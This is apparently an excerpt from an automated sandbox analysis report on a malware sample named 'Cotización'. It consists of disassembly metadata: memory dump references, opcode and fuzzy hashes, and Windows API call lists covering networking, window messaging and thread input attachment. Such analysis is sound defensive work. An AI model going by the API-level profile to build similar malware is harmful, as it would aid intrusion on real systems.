                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Long$AttributesLayered
                • String ID:
                • API String ID: 2169480361-0
                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                APIs
                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                • lstrlenW.KERNEL32(?), ref: 00434CF6
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: lstrcmpilstrcpylstrlen$_malloc
                • String ID: cdecl
                • API String ID: 3850814276-3896280584
                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                APIs
                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                • _memmove.LIBCMT ref: 0046D475
                • inet_ntoa.WSOCK32(?), ref: 0046D481
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                • String ID:
                • API String ID: 2502553879-0
                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                APIs
                • SendMessageW.USER32 ref: 00448C69
                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorLastacceptselect
                • String ID:
                • API String ID: 385091864-0
                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                • GetStockObject.GDI32(00000011), ref: 00430258
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$CreateMessageObjectSendShowStock
                • String ID:
                • API String ID: 1358664141-0
                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                • String ID:
                • API String ID: 2880819207-0
                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                APIs
                • GetWindowRect.USER32(?,?), ref: 00430BA2
                • ScreenToClient.USER32(?,?), ref: 00430BC1
                • ScreenToClient.USER32(?,?), ref: 00430BE2
                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                APIs
                • __wsplitpath.LIBCMT ref: 0043392E
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • __wsplitpath.LIBCMT ref: 00433950
                • __wcsicoll.LIBCMT ref: 00433974
                • __wcsicoll.LIBCMT ref: 0043398A
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                • String ID:
                • API String ID: 1187119602-0
                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$_malloc_wcscat_wcscpy
                • String ID:
                • API String ID: 1597257046-0
                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                APIs
                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                • __malloc_crt.LIBCMT ref: 0041F5B6
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free__malloc_crt
                • String ID:
                • API String ID: 237123855-0
                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: DeleteDestroyObject$IconWindow
                • String ID:
                • API String ID: 3349847261-0
                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                APIs
                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                • String ID:
                • API String ID: 2223660684-0
                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                • LineTo.GDI32(?,?,?), ref: 00447326
                • EndPath.GDI32(?), ref: 00447336
                • StrokePath.GDI32(?), ref: 00447344
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                • String ID:
                • API String ID: 2783949968-0
                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                APIs
                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                • AttachThreadInput.USER32(00000000), ref: 004364AA
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                • String ID:
                • API String ID: 2710830443-0
                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
